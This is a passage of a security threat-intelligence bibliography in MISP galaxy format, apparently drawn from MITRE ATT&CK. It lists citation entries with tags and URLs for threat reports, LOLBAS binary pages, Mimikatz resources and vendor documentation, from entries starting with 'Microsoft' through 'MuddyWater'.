Microsoft Threat Intelligence Tweet April 26 2023

MsftSecIntel. (2023, May 26). Microsoft Threat Intelligence Tweet April 26 2023. Retrieved June 16, 2023.

The tag is: misp-galaxy:references="Microsoft Threat Intelligence Tweet April 26 2023"

Table 14487. Table References

Links

https://twitter.com/MsftSecIntel/status/1651346653901725696

Microsoft Threat Intelligence Tweet August 17 2023

MsftSecIntel. (2023, August 17). Microsoft Threat Intelligence Tweet August 17 2023. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Microsoft Threat Intelligence Tweet August 17 2023"

Table 14488. Table References

Links

https://twitter.com/MsftSecIntel/status/1692212191536066800

Wikipedia Windows Library Files

Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="Wikipedia Windows Library Files"

Table 14489. Table References

Links

https://en.wikipedia.org/wiki/Microsoft_Windows_library_files

Proofpoint Cobalt June 2017

Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Proofpoint Cobalt June 2017"

Table 14490. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

Microsoft.Workflow.Compiler.exe - LOLBAS Project

LOLBAS. (2018, October 22). Microsoft.Workflow.Compiler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Microsoft.Workflow.Compiler.exe - LOLBAS Project"

Table 14491. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/

InfoSecurity Sandworm Oct 2014

Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="InfoSecurity Sandworm Oct 2014"

Table 14492. Table References

Links

https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/

objective-see windtail1 dec 2018

Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 1). Retrieved October 3, 2019.

The tag is: misp-galaxy:references="objective-see windtail1 dec 2018"

Table 14493. Table References

Links

https://objective-see.com/blog/blog_0x3B.html

objective-see windtail2 jan 2019

Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 2). Retrieved October 3, 2019.

The tag is: misp-galaxy:references="objective-see windtail2 jan 2019"

Table 14494. Table References

Links

https://objective-see.com/blog/blog_0x3D.html

CyberScoop BlackOasis Oct 2017

Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="CyberScoop BlackOasis Oct 2017"

Table 14495. Table References

Links

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

Deply Mimikatz

Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.

The tag is: misp-galaxy:references="Deply Mimikatz"

Table 14496. Table References

Links

https://github.com/gentilkiwi/mimikatz

CG 2014

CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="CG 2014"

Table 14497. Table References

Links

http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html

ADSecurity AD Kerberos Attacks

Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="ADSecurity AD Kerberos Attacks"

Table 14498. Table References

Links

https://adsecurity.org/?p=556

Harmj0y Mimikatz and DCSync

Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="Harmj0y Mimikatz and DCSync"

Table 14499. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

Harmj0y DCSync Sept 2015

Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Harmj0y DCSync Sept 2015"

Table 14500. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

AdSecurity DCSync Sept 2015

Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="AdSecurity DCSync Sept 2015"

Table 14501. Table References

Links

https://adsecurity.org/?p=1729

ADSecurity Mimikatz DCSync

Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="ADSecurity Mimikatz DCSync"

Table 14502. Table References

Links

https://adsecurity.org/?p=1729

GitHub Mimikittenz July 2016

Jamieson O’Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="GitHub Mimikittenz July 2016"

Table 14503. Table References

Links

https://github.com/putterpanda/mimikittenz

MimiPenguin GitHub May 2017

Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="MimiPenguin GitHub May 2017"

Table 14504. Table References

Links

https://github.com/huntergregal/mimipenguin

Securelist Minidionis July 2015

Lozhkin, S.. (2015, July 16). Minidionis – one more APT with a usage of cloud drives. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="Securelist Minidionis July 2015"

Table 14505. Table References

Links

https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/

mining_ruby_reversinglabs

Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.

The tag is: misp-galaxy:references="mining_ruby_reversinglabs"

Table 14506. Table References

Links

https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems

lazgroup_idn_phishing

RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="lazgroup_idn_phishing"

Table 14507. Table References

Links

https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/

APT15 Intezer June 2018

Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="APT15 Intezer June 2018"

Table 14508. Table References

Links

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Slideshare Abusing SSH

Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="Slideshare Abusing SSH"

Table 14509. Table References

Links

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

ACSC Email Spoofing

Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="ACSC Email Spoofing"

Table 14510. Table References

Links

https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

NSA Cyber Mitigating Web Shells

NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.

The tag is: misp-galaxy:references="NSA Cyber Mitigating Web Shells"

Table 14511. Table References

Links

https://github.com/nsacyber/Mitigating-Web-Shells

MIT ccache

Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MIT ccache"

Table 14512. Table References

Links

https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html

MITRE SE Guide 2014

The MITRE Corporation. (2014). MITRE Systems Engineering Guide. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="MITRE SE Guide 2014"

Table 14513. Table References

Links

https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf

win_mmc

Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_mmc"

Table 14514. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc

Mmc.exe - LOLBAS Project

LOLBAS. (2018, December 4). Mmc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mmc.exe - LOLBAS Project"

Table 14515. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mmc/

Trend Micro Bouncing Golf 2019

  1. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.

The tag is: misp-galaxy:references="Trend Micro Bouncing Golf 2019"

Table 14516. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

ELF Injection May 2009

O’Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="ELF Injection May 2009"

Table 14517. Table References

Links

https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html

Elastic Rules macOS launchctl 2022

Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.

The tag is: misp-galaxy:references="Elastic Rules macOS launchctl 2022"

Table 14518. Table References

Links

https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html

modinfo man

Russell, R. (n.d.). modinfo(8) - Linux man page. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="modinfo man"

Table 14519. Table References

Links

https://linux.die.net/man/8/modinfo

hasherezade debug

hasherezade. (2021, June 30). Module 3 - Understanding and countering malware’s evasion and self-defence. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="hasherezade debug"

Table 14520. Table References

Links

https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf

Microsoft Module Class

Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Module Class"

Table 14521. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module

GitHub Mimikatz kerberos Module

Deply, B., Le Toux, V.. (2016, June 5). module ~ kerberos. Retrieved March 17, 2020.

The tag is: misp-galaxy:references="GitHub Mimikatz kerberos Module"

Table 14522. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/module--kerberos

GitHub Mimikatz lsadump Module

Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.

The tag is: misp-galaxy:references="GitHub Mimikatz lsadump Module"

Table 14523. Table References

Links

https://github.com/gentilkiwi/mimikatz/wiki/module--lsadump

Module Stomping for Shellcode Injection

Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="Module Stomping for Shellcode Injection"

Table 14524. Table References

Links

https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection

Linux Kernel Module Programming Guide

Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Linux Kernel Module Programming Guide"

Table 14525. Table References

Links

http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html

FOX-IT May 2016 Mofang

Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="FOX-IT May 2016 Mofang"

Table 14526. Table References

Links

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

Unit42 Molerat Mar 2020

Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.

The tag is: misp-galaxy:references="Unit42 Molerat Mar 2020"

Table 14527. Table References

Links

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

Cybereason Molerats Dec 2020

Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.

The tag is: misp-galaxy:references="Cybereason Molerats Dec 2020"

Table 14528. Table References

Links

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

Azure - Monitor Logs

Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="Azure - Monitor Logs"

Table 14529. Table References

Links

https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor

EventTracker File Permissions Feb 2014

Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.

The tag is: misp-galaxy:references="EventTracker File Permissions Feb 2014"

Table 14530. Table References

Links

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

Microsoft Silent Process Exit NOV 2017

Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.

The tag is: misp-galaxy:references="Microsoft Silent Process Exit NOV 2017"

Table 14531. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

Windows Event Forwarding Payne

Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.

The tag is: misp-galaxy:references="Windows Event Forwarding Payne"

Table 14532. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

GCP Monitoring Service Account Usage

Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.

The tag is: misp-galaxy:references="GCP Monitoring Service Account Usage"

Table 14533. Table References

Links

https://cloud.google.com/iam/docs/service-account-monitoring

Forcepoint Monsoon

Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.

The tag is: misp-galaxy:references="Forcepoint Monsoon"

Table 14534. Table References

Links

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Security Intelligence More Eggs Aug 2019

Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.

The tag is: misp-galaxy:references="Security Intelligence More Eggs Aug 2019"

Table 14535. Table References

Links

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

ESET EvilNum July 2020

Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="ESET EvilNum July 2020"

Table 14536. Table References

Links

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

Microsoft DLL Preloading

Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft DLL Preloading"

Table 14537. Table References

Links

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

Microsoft More information about DLL

Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft More information about DLL"

Table 14538. Table References

Links

https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/

aptsim

valsmith. (2012, September 21). More on APTSim. Retrieved September 28, 2017.

The tag is: misp-galaxy:references="aptsim"

Table 14539. Table References

Links

http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html

Washington Post WannaCry 2017

Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Washington Post WannaCry 2017"

Table 14540. Table References

Links

https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4

ArsTechnica Intel

Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="ArsTechnica Intel"

Table 14541. Table References

Links

https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/

Kaspersky Winnti April 2013

Kaspersky Lab’s Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Kaspersky Winnti April 2013"

Table 14542. Table References

Links

https://securelist.com/winnti-more-than-just-a-game/37029/

polygot_icedID

Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="polygot_icedID"

Table 14543. Table References

Links

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload

CrowdStrike Deep Panda Web Shells

RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.

The tag is: misp-galaxy:references="CrowdStrike Deep Panda Web Shells"

Table 14544. Table References

Links

http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/

MoustachedBouncer ESET August 2023

Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="MoustachedBouncer ESET August 2023"

Table 14545. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

ESET MoustachedBouncer

Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="ESET MoustachedBouncer"

Table 14546. Table References

Links

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Progress Software MOVEit Transfer Critical Vulnerability

Progress Software. (2023, June 16). MOVEit Transfer Critical Vulnerability (May 2023) (CVE-2023-34362). Retrieved July 28, 2023.

The tag is: misp-galaxy:references="Progress Software MOVEit Transfer Critical Vulnerability"

Table 14547. Table References

Links

https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

TechNet Moving Beyond EMET

Nunez, N. (2017, August 9). Moving Beyond EMET II – Windows Defender Exploit Guard. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="TechNet Moving Beyond EMET"

Table 14548. Table References

Links

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

ScriptingOSX zsh

Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="ScriptingOSX zsh"

Table 14549. Table References

Links

https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/

Volatility Detecting Hooks Sept 2012

Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Volatility Detecting Hooks Sept 2012"

Table 14550. Table References

Links

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

Mozilla Firefox Installer DLL Hijack

Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="Mozilla Firefox Installer DLL Hijack"

Table 14551. Table References

Links

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

mozilla_sec_adv_2012

Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.

The tag is: misp-galaxy:references="mozilla_sec_adv_2012"

Table 14552. Table References

Links

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

MpCmdRun.exe - LOLBAS Project

LOLBAS. (2020, March 20). MpCmdRun.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="MpCmdRun.exe - LOLBAS Project"

Table 14553. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

TechNet MS14-019

Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking via .cmd or .bat file. Retrieved July 25, 2016.

The tag is: misp-galaxy:references="TechNet MS14-019"

Table 14554. Table References

Links

https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/

SRD GPP

Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.

The tag is: misp-galaxy:references="SRD GPP"

Table 14555. Table References

Links

http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx

MS14-025

Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="MS14-025"

Table 14556. Table References

Links

https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati

Microsoft MS14-025

Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.

The tag is: misp-galaxy:references="Microsoft MS14-025"

Table 14557. Table References

Links

http://support.microsoft.com/kb/2962486

MSDN MSBuild

Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.

The tag is: misp-galaxy:references="MSDN MSBuild"

Table 14558. Table References

Links

https://msdn.microsoft.com/library/dd393574.aspx

LOLBAS Msbuild

LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Msbuild"

Table 14559. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msbuild/

Microsoft MSBuild Inline Tasks 2017

Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.

The tag is: misp-galaxy:references="Microsoft MSBuild Inline Tasks 2017"

Table 14560. Table References

Links

https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element

Msconfig.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msconfig.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msconfig.exe - LOLBAS Project"

Table 14561. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msconfig/

Msdeploy.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msdeploy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msdeploy.exe - LOLBAS Project"

Table 14562. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/

MSDN File Associations

Microsoft. (n.d.). Retrieved July 26, 2016.

The tag is: misp-galaxy:references="MSDN File Associations"

Table 14563. Table References

Links

https://msdn.microsoft.com/en-us/library/cc144156.aspx

Microsoft DRSR Dec 2017

Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft DRSR Dec 2017"

Table 14564. Table References

Links

https://msdn.microsoft.com/library/cc228086.aspx

Msdt.exe - LOLBAS Project

LOLBAS. (2018, May 25). Msdt.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msdt.exe - LOLBAS Project"

Table 14565. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

Msedge.exe - LOLBAS Project

LOLBAS. (2022, January 20). Msedge.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Msedge.exe - LOLBAS Project"

Table 14566. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msedge/

msedge_proxy.exe - LOLBAS Project

LOLBAS. (2023, August 18). msedge_proxy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msedge_proxy.exe - LOLBAS Project"

Table 14567. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/

msedgewebview2.exe - LOLBAS Project

LOLBAS. (2023, June 15). msedgewebview2.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msedgewebview2.exe - LOLBAS Project"

Table 14568. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/

LOLBAS Mshta

LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.

The tag is: misp-galaxy:references="LOLBAS Mshta"

Table 14569. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

Mshtml.dll - LOLBAS Project

LOLBAS. (2018, May 25). Mshtml.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mshtml.dll - LOLBAS Project"

Table 14570. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Mshtml/

Microsoft msiexec

Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft msiexec"

Table 14571. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

LOLBAS Msiexec

LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="LOLBAS Msiexec"

Table 14572. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

CIS Emotet Dec 2018

CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="CIS Emotet Dec 2018"

Table 14573. Table References

Links

https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/

Microsoft NRPC Dec 2017

Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.

The tag is: misp-galaxy:references="Microsoft NRPC Dec 2017"

Table 14574. Table References

Links

https://msdn.microsoft.com/library/cc237008.aspx

MsoHtmEd.exe - LOLBAS Project

LOLBAS. (2022, July 24). MsoHtmEd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="MsoHtmEd.exe - LOLBAS Project"

Table 14575. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/

Mspub.exe - LOLBAS Project

LOLBAS. (2022, August 2). Mspub.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mspub.exe - LOLBAS Project"

Table 14576. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/

Microsoft SAMR

Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft SAMR"

Table 14577. Table References

Links

https://msdn.microsoft.com/library/cc245496.aspx

GitHub IAD Secure Host Baseline UAC Filtering

NSA IAD. (2017, January 24). MS Security Guide. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="GitHub IAD Secure Host Baseline UAC Filtering"

Table 14578. Table References

Links

https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml

msxsl.exe - LOLBAS Project

LOLBAS. (2018, May 25). msxsl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="msxsl.exe - LOLBAS Project"

Table 14579. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

XSL Bypass Mar 2019

Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.

The tag is: misp-galaxy:references="XSL Bypass Mar 2019"

Table 14580. Table References

Links

https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75

Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="Mandiant M-Trends 2015"

Table 14581. Table References

Links

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

MTrends 2016

Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.

The tag is: misp-galaxy:references="MTrends 2016"

Table 14582. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf

Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.

The tag is: misp-galaxy:references="Mandiant M-Trends 2020"

Table 14583. Table References

Links

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Accenture MUDCARP March 2019

Accenture iDefense Unit. (2019, March 5). Mudcarp’s Focus on Submarine Technologies. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Accenture MUDCARP March 2019"

Table 14584. Table References

Links

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

Unit 42 MuddyWater Nov 2017

Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Unit 42 MuddyWater Nov 2017"

Table 14585. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

Securelist MuddyWater Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.

The tag is: misp-galaxy:references="Securelist MuddyWater Oct 2018"

Table 14586. Table References

Links

https://securelist.com/muddywater/88059/

ClearSky MuddyWater Nov 2018

ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="ClearSky MuddyWater Nov 2018"

Table 14587. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

TrendMicro POWERSTATS V3 June 2019

Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="TrendMicro POWERSTATS V3 June 2019"

